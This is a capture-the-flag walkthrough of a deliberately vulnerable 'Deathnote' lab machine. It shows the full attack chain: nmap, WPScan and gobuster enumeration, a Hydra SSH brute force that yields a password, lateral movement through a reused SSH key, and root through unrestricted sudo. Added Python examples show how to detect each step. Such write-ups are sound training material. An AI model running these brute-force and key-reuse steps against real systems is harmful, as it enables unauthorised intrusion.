From the scan result, we have discovered our target IP address: 192.168.162.6.
Network Discovery with Nmap
Now, let's perform a port scan to detect which ports are open. Scanning the network is an essential part of the enumeration process: it gives us a better understanding of the attack surface so that we can plan targeted tests. As in most cases, we are going to use the well-known Nmap tool.
-sS: TCP SYN scan. It is the quick, default and most popular scan type and can cover thousands of ports.
-sC: Performs a script scan using the default set of NSE scripts.
-sV: Enables version detection, which identifies what service versions are running on which ports.
-p-: Scans all ports.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -sC -p- 192.168.162.6
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-07 15:42 EDT
Nmap scan report for 192.168.162.6
Host is up (0.00094s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:CF:C2:1C (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.47 seconds
┌──(kali㉿kali)-[~]
└─$
From the network scan, we have spotted two open ports.
Port 22/TCP runs an SSH service, which means that if we have valid credentials, it will be easy to gain login access to the server.
Port 80/TCP runs an HTTP service, which indicates that a website is hosted there, possibly a vulnerable one.
Web Enumeration
So, let's take a look at the web content running on port 80. To see it ourselves, we can open a web browser of our choice and navigate to the target's IP address in the URL bar at the top of the window.
When we try to access the webpage through the browser, we are presented with the following error.
Here, we can't connect to the server at "deathnote.vuln".
This type of error has two possible underlying causes:
We mistyped the address in the URL bar, so the DNS servers cannot find an IP address for the mistyped name.
We never entered a hostname like “deathnote.vuln” in the URL bar, but the website expects us to use it.
Resolving Server Connection Issues by Modifying Hosts File
This type of problem can be fixed by modifying the local hosts file, /etc/hosts. Open a terminal and type the following command to add the IP address with its associated hostname to the hosts table, which allows your web client to reach the website that previously reported an error.
┌──(kali㉿kali)-[~]
└─$sudo nano /etc/hosts
[sudo] password for kali:
127.0.0.1 localhost
127.0.1.1 kali
192.168.162.6 deathnote.vuln
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Now save it using Ctrl+X and hit Enter. You can verify the /etc/hosts table using the following command.
┌──(kali㉿kali)-[~]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
192.168.162.6 deathnote.vuln
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
┌──(kali㉿kali)-[~]
└─$
Once this configuration is complete, we can reload the target's webpage and verify whether it loads. Since the requested hostname now has an entry in /etc/hosts, the website loads without any issues.
Looking at the URL at the top of the window, it appears that the website is built with the WordPress CMS.
WordPress sites are frequently an easy target because they are often left with outdated or vulnerable components. So, we ran the WPScan tool against the target application to identify known vulnerabilities.
WordPress Security Assessment with WPScan
WPScan checks whether the running site's WordPress core version is vulnerable and whether its themes and plugins are up to date or known to be vulnerable.
WPScan is a black-box WordPress vulnerability scanner that can be used to scan WordPress websites for known security vulnerabilities. It is written in Ruby and offers various scanning features such as plugin enumeration, theme enumeration, password brute-forcing, and vulnerability detection. WPScan helps WordPress administrators and security professionals identify and fix security issues to secure their WordPress installations against potential attacks.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Sep 7 15:49:49 2022
[+] Requests Done: 186
[+] Cached Requests: 5
[+] Data Sent: 48.786 KB
[+] Data Received: 19.153 MB
[+] Memory used: 240.469 MB
[+] Elapsed time: 00:00:12
┌──(kali㉿kali)-[~]
└─$
From the output, we notice that the WordPress core version itself has no known vulnerabilities, but the scan reports some interesting and useful misconfigurations that could help us gain a foothold on the server.
They are:
Headers, which indicate that the server is running Apache.
XML-RPC is enabled, but it is not useful at this moment.
The WordPress readme.txt is accessible, which describes the WordPress installation procedure.
The upload directory has directory listing enabled, which means we can directly browse the content within that WordPress directory.
Some other checks are reported as well; have a look at them too. Next, let's enumerate the target URL for hidden or hard-to-reach directories and pages, which we can do through directory busting.
Discovery of Hidden Directories and files with Gobuster
Using gobuster as our tool of choice, we use the following switches to get the fastest, most accurate results.
dir: Selects the directory/file enumeration mode.
-u: Specifies the target URL.
-w: Specifies the path of the wordlist.
┌──(kali㉿kali)-[~]
└─$ gobuster dir --url http://deathnote.vuln/wordpress/ --wordlist /usr/share/wordlists/dirb/common.txt
As a result of directory busting, we found the WP admin login page. As we don't have a valid username and password, we can't log in.
Since we performed the directory busting only on the WordPress directory, there might be more hidden or hard-to-reach directories and pages on deathnote.vuln itself.
┌──(kali㉿kali)-[~]
└─$ gobuster dir --url http://deathnote.vuln/ --wordlist /usr/share/wordlists/dirb/common.txt
From the result of directory busting, we obtained the robots.txt file. Let's dig into this file and find out whether it holds any sensitive information that might help us gain a foothold.
From robots.txt we discover another hint. It points to what seems to be an image file that was mistakenly added to the target application. So, let us open the file important.jpg in the browser.
The browser shows an error when I try to open the file, so I decided to download the image file to our Kali machine for further analysis. Open a new terminal and type the following command:
You can find the downloaded file in the current directory on the Kali machine.
Let me open the image file from here. As a result, you can notice that the same error occurs.
Analyzing File Types with the 'file' Command
There might be some problem with this file. Let me run the file command to determine its type.
┌──(kali㉿kali)-[~]
└─$ file important.jpg
important.jpg: ASCII text
┌──(kali㉿kali)-[~]
└─$
From the output, we discover that the file is ASCII text, i.e. a text file rather than an image. So rename the file with a .txt extension and open it.
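Trusting the extension is exactly how a text hint ended up served as important.jpg; an upload handler or review script should classify files by content the way the file command does. The following Python is an added example (not from the original walkthrough): its magic-byte table is a constructed subset and the sample hint text is made up.

```python
import os

# Leading magic bytes -> `file`-style description (constructed subset)
MAGIC = {
    b"\xff\xd8\xff": "JPEG image data",
    b"\x89PNG\r\n\x1a\n": "PNG image data",
    b"GIF87a": "GIF image data",
    b"GIF89a": "GIF image data",
    b"%PDF-": "PDF document",
    b"PK\x03\x04": "Zip archive data",
    b"\x7fELF": "ELF executable",
}
# Extension -> word that must appear in the detected description
EXPECTED = {".jpg": "JPEG", ".jpeg": "JPEG", ".png": "PNG", ".gif": "GIF",
            ".pdf": "PDF", ".zip": "Zip"}
# Printable ASCII plus tab, LF and CR
TEXT_BYTES = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}

def detect_type(data: bytes) -> str:
    """Classify by content only, like `file`; the file name is never consulted."""
    for magic, desc in MAGIC.items():
        if data.startswith(magic):
            return desc
    if not data:
        return "empty"
    if all(b in TEXT_BYTES for b in data):
        return "ASCII text"
    return "data"

def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when the extension promises a type the bytes do not back up."""
    expected = EXPECTED.get(os.path.splitext(filename)[1].lower())
    if expected is None:
        return False          # no expectation registered for this extension
    return expected not in detect_type(data)

def check_upload(filename: str, data: bytes) -> str:
    """One-line verdict an upload handler or audit script could log."""
    kind = detect_type(data)
    flag = "MISMATCH" if extension_mismatch(filename, data) else "ok"
    return f"{filename}: {kind} [{flag}]"
```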
The hint message indicates a piece of information that could help us log into the target application. Previously, we saw that a user.txt file exists within the upload directory.
Let us open the user.txt file in a new tab.
As you can see, a few users are listed in this wordlist. If we also had a wordlist of passwords, we could perform a brute-force attack to obtain access.
Foothold
While exploring the upload contents, I identified that the notes.txt file might be a wordlist containing candidate passwords.
Now we have wordlists for usernames and passwords, so let's perform a brute-force attack to find a valid username with its password.
Before that, we have to download these files using the wget command-line utility.
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-07 16:05:24
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 731 login tries (l:17/p:43), ~46 tries per task
[DATA] attacking ssh://192.168.162.6:22/
[STATUS] 271.00 tries/min, 271 tries in 00:01h, 463 to do in 00:02h, 13 active
[22][ssh] host: 192.168.162.6 login: l password: death4me
[STATUS] 277.50 tries/min, 555 tries in 00:02h, 179 to do in 00:01h, 13 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-07 16:08:08
┌──(kali㉿kali)-[~]
└─$
From the output above, we have discovered a username and its password, shown in the line below:
[22][ssh] host: 192.168.162.6 login: l password: death4me
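On the defending side, a Hydra run like this one (731 attempts in about three minutes, followed by one success) is loud in sshd's auth.log. The following Python is an added example, not part of the original post: it flags failure bursts per source and, more importantly, a successful login from a source that was just bursting. The log lines are constructed and the attacker address 192.168.162.5 is assumed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# sshd password-auth outcomes as they appear in /var/log/auth.log
LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2"
)

def parse(line, year=2022):
    """Return (timestamp, result, user, ip) or None for non-auth lines."""
    m = LINE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]

def detect_bruteforce(lines, threshold=10, window=timedelta(minutes=1)):
    """Alerts (ip, kind, detail): 'burst' = >= threshold failures from one source
    inside the window; 'success_after_burst' = the guessing worked, as for user l."""
    fails = defaultdict(list)   # ip -> failure timestamps inside the window
    users = defaultdict(set)    # ip -> distinct usernames tried
    bursting, alerts = set(), []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, result, user, ip = rec
        fails[ip] = [t for t in fails[ip] if ts - t <= window]  # slide the window
        if result == "Failed":
            fails[ip].append(ts)
            users[ip].add(user)
            if len(fails[ip]) >= threshold and ip not in bursting:
                bursting.add(ip)
                alerts.append((ip, "burst", f"{len(fails[ip])} failures, {len(users[ip])} users"))
        elif ip in bursting:
            alerts.append((ip, "success_after_burst", f"login as {user}"))
    return alerts

# Constructed sample: 12 rapid failures for different users, then one success,
# all from the assumed attacker address 192.168.162.5.
SAMPLE = [
    f"Sep  7 16:05:{s:02d} deathnote sshd[{1000 + s}]: Failed password for "
    f"invalid user u{s} from 192.168.162.5 port {40000 + s} ssh2"
    for s in range(12)
] + ["Sep  7 16:05:30 deathnote sshd[1100]: Accepted password for l from 192.168.162.5 port 40100 ssh2"]
```

Hydra's own warning above (16 parallel tasks against sshd) is also visible server-side as many concurrent connections from one address; the per-source counter here catches that regardless of how many usernames are rotated.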
Now we have a valid username and password to log into the server via an SSH client, so let's log in.
The content of the user flag looks like a hint encoded in the Brainfuck esoteric language. To decode it, we can use an online Brainfuck decoder.
As you can see, a message appears after decoding it.
Privilege Escalation
Let me run the id command to find out the user and group names and the numeric IDs (UID and GID) of the current user.
Since user l does not have sudo privileges, we are going to gather further information about the target machine that could be useful for gaining root access.
Let's identify the rights and privileges of the current user by executing the sudo -l command.
l@deathnote:~$ sudo -l
[sudo] password for l:
Sorry, user l may not run sudo on deathnote.
l@deathnote:~$
The output shows that the current user does not have the right to run sudo, which means there might be another user who has permission to run sudo commands.
SUID Binary Privilege Escalation via SSH Access and CyberChef Decode
To find out which user has sudo permissions, look in the home directories. Run the ls command to list the directories within /home.
l@deathnote:~$cd /home
l@deathnote:/home$ ls -al
total 16
drwxr-xr-x 4 root root 4096 Jul 19 2021 .
drwxr-xr-x 18 root root 4096 Jul 19 2021 ..
drwxr-xr-x 4 kira kira 4096 Sep 4 2021 kira
drwxr-xr-x 4 l l 4096 Sep 4 2021 l
l@deathnote:/home$
There are two directories, kira and l. This suggests that the user kira might have root permissions.
We don't have access to the user kira, but we can still check the files inside that home directory.
l@deathnote:/home/kira$ ls -al
total 32
drwxr-xr-x 4 kira kira 4096 Sep 4 2021 .
drwxr-xr-x 4 root root 4096 Jul 19 2021 ..
-rw------- 1 kira kira 0 Sep 4 2021 .bash_history
-rw-r--r-- 1 kira kira 220 Jul 19 2021 .bash_logout
-rw-r--r-- 1 kira kira 3526 Jul 19 2021 .bashrc
-rwx------ 1 kira root 85 Aug 29 2021 kira.txt
drwxr-xr-x 3 kira kira 4096 Jul 19 2021 .local
-rw-r--r-- 1 kira kira 807 Jul 19 2021 .profile
drwxr-xr-x 2 kira kira 4096 Jul 19 2021 .ssh
kira@deathnote:~$
There are no special files except kira.txt. Let me have a look at it.
l@deathnote:/home/kira$ cat kira.txt
cat: kira.txt: Permission denied
l@deathnote:/home/kira$
This shows an error because we don't have permission to read it. It means we have to switch to the user kira, but we don't have the password.
We can easily switch to the user kira with the help of SSH. As you can see, there is a directory named .ssh, which holds the access credentials for the SSH protocol.
l@deathnote:/home/kira$cd .ssh/
l@deathnote:/home/kira/.ssh$ ls -al
total 12
drwxr-xr-x 2 kira kira 4096 Jul 19 2021 .
drwxr-xr-x 4 kira kira 4096 Sep 4 2021 ..
-rw-r--r-- 1 kira kira 393 Jul 19 2021 authorized_keys
l@deathnote:/home/kira/.ssh$
The .ssh directory contains an authorized_keys file, which holds the public keys accepted for public-key authentication. Let me have a look at it.
As you can see, the user l has permission to log in through the SSH client. Before that, we have to add this authorized key to the .ssh directory that exists within user l's home directory.
l@deathnote:/home/kira/.ssh$ cd /home/l
l@deathnote:~$ ls -al
total 36
drwxr-xr-x 4 l l 4096 Sep 4 2021 .
drwxr-xr-x 4 root root 4096 Jul 19 2021 ..
-rw------- 1 l l 0 Sep 4 2021 .bash_history
-rw-r--r-- 1 l l 220 Jul 19 2021 .bash_logout
-rw-r--r-- 1 l l 3526 Jul 19 2021 .bashrc
drwxr-xr-x 3 l l 4096 Jul 19 2021 .local
-rw-r--r-- 1 l l 807 Jul 19 2021 .profile
drwxr-xr-x 2 l l 4096 Jul 19 2021 .ssh
-rw-r--r-- 1 root root 807 Jul 19 2021 user.txt
l@deathnote:~$
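The lateral-movement path above, one account's key sitting in another account's authorized_keys, is what a defender should audit for. The following Python is an added example, not from the original post: it parses authorized_keys entries collected from each home directory, computes ssh-keygen-style SHA256 fingerprints, and reports keys accepted by more than one account, keys with no from= restriction, and writable files. The inputs (key blobs, modes, comments, the 192.168.162.0/24 range) are constructed.

```python
import base64
import hashlib
from collections import defaultdict

def parse_entry(line):
    """Return (options, keytype, SHA256 fingerprint, comment) or None; options with spaces unsupported."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    options = ""
    head = line.split(None, 1)
    # If the first field is not a key type, it is the options list.
    if not head[0].startswith(("ssh-", "ecdsa-", "sk-")) and len(head) == 2:
        options, line = head[0], head[1]
    parts = line.split(None, 2)            # keytype, blob, optional comment
    if len(parts) < 2:
        return None
    digest = hashlib.sha256(base64.b64decode(parts[1])).digest()
    fp = "SHA256:" + base64.b64encode(digest).decode().rstrip("=")  # as ssh-keygen -l prints it
    return options, parts[0], fp, (parts[2] if len(parts) > 2 else "")

def audit(files):
    """files: {account: (file mode, authorized_keys content)} -> list of finding strings."""
    accepted = defaultdict(set)            # fingerprint -> accounts that accept it
    findings = []
    for account, (mode, content) in files.items():
        if mode & 0o022:
            findings.append(f"{account}: authorized_keys is group/world-writable")
        for line in content.splitlines():
            entry = parse_entry(line)
            if entry is None:
                continue
            options, _, fp, _ = entry
            accepted[fp].add(account)
            if "from=" not in options:
                findings.append(f"{account}: {fp} has no from= restriction")
    for fp, accounts in sorted(accepted.items()):
        if len(accounts) > 1:      # one key opens several accounts: lateral-movement path
            findings.append(f"key {fp} accepted by multiple accounts: {', '.join(sorted(accounts))}")
    return findings

def sample_key(tag):
    """Constructed key blob (base64 of a tag string), not a real public key."""
    return "ssh-ed25519 " + base64.b64encode(f"constructed-{tag}".encode()).decode()

# Constructed inputs modelled on the box: kira's file accepts l's key.
SAMPLE = {
    "kira": (0o644, sample_key("l-key") + " l@deathnote\n"),
    "l":    (0o600, sample_key("l-key") + " l@deathnote\n"),
    "root": (0o666, 'from="192.168.162.0/24" ' + sample_key("admin") + " admin\n"),
}
```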
Create a new file for the authorized keys with the help of the vi text editor:
From the output, we have discovered that there is an /opt directory that might contain something special. Let me change into it and list its files and directories.
kira@deathnote:~$ cd /opt/
kira@deathnote:/opt$ls -al
total 12
drwxr-xr-x 3 root root 4096 Aug 29 2021 .
drwxr-xr-x 18 root root 4096 Jul 19 2021 ..
drwxr-xr-x 4 root root 4096 Aug 29 2021 L
kira@deathnote:/opt$
Here is another directory, L. Let me change into it.
kira@deathnote:/opt$ cd L
kira@deathnote:/opt/L$ls -al
total 16
drwxr-xr-x 4 root root 4096 Aug 29 2021 .
drwxr-xr-x 3 root root 4096 Aug 29 2021 ..
drwxr-xr-x 2 root root 4096 Aug 29 2021 fake-notebook-rule
drwxr-xr-x 2 root root 4096 Aug 29 2021 kira-case
kira@deathnote:/opt/L$
Directory L contains two more directories. Let's have a look at the fake-notebook-rule directory.
kira@deathnote:/opt/L$ cd fake-notebook-rule/
kira@deathnote:/opt/L/fake-notebook-rule$ ls -al
total 16
drwxr-xr-x 2 root root 4096 Aug 29 2021 .
drwxr-xr-x 4 root root 4096 Aug 29 2021 ..
-rw-r--r-- 1 root root 84 Aug 29 2021 case.wav
-rw-r--r-- 1 root root 15 Aug 29 2021 hint
kira@deathnote:/opt/L/fake-notebook-rule$
The fake-notebook-rule directory contains two important files: an audio file (case.wav) and a text file named hint. Let me have a look at the hint.
kira@deathnote:/opt/L/fake-notebook-rule$cat hint
use cyberchef
kira@deathnote:/opt/L/fake-notebook-rule$
The hint tells us to use the CyberChef tool, which means there is probably encoded text here.
CyberChef is an open-source web application designed to handle various cybersecurity tasks, serving as a "Swiss Army Knife" for cyber analysts and security professionals. It provides a wide range of operations, including encoding, decoding, encryption, decryption, compression, decompression, and data analysis. CyberChef offers a visual interface where users can chain together different operations to manipulate data and analyze it efficiently. It is particularly useful for tasks such as data transformation, reverse engineering, and cryptanalysis.
Let me run the file command-line utility to determine the type of the file:
User kira may run the following commands on deathnote:
(ALL : ALL) ALL
kira@deathnote:/opt/L/fake-notebook-rule$
kira has unrestricted sudo permissions, which means we have successfully escalated to the highest privilege. To obtain the root flag, simply change directory to /root.
kira@deathnote:/opt/L/fake-notebook-rule$ cd /root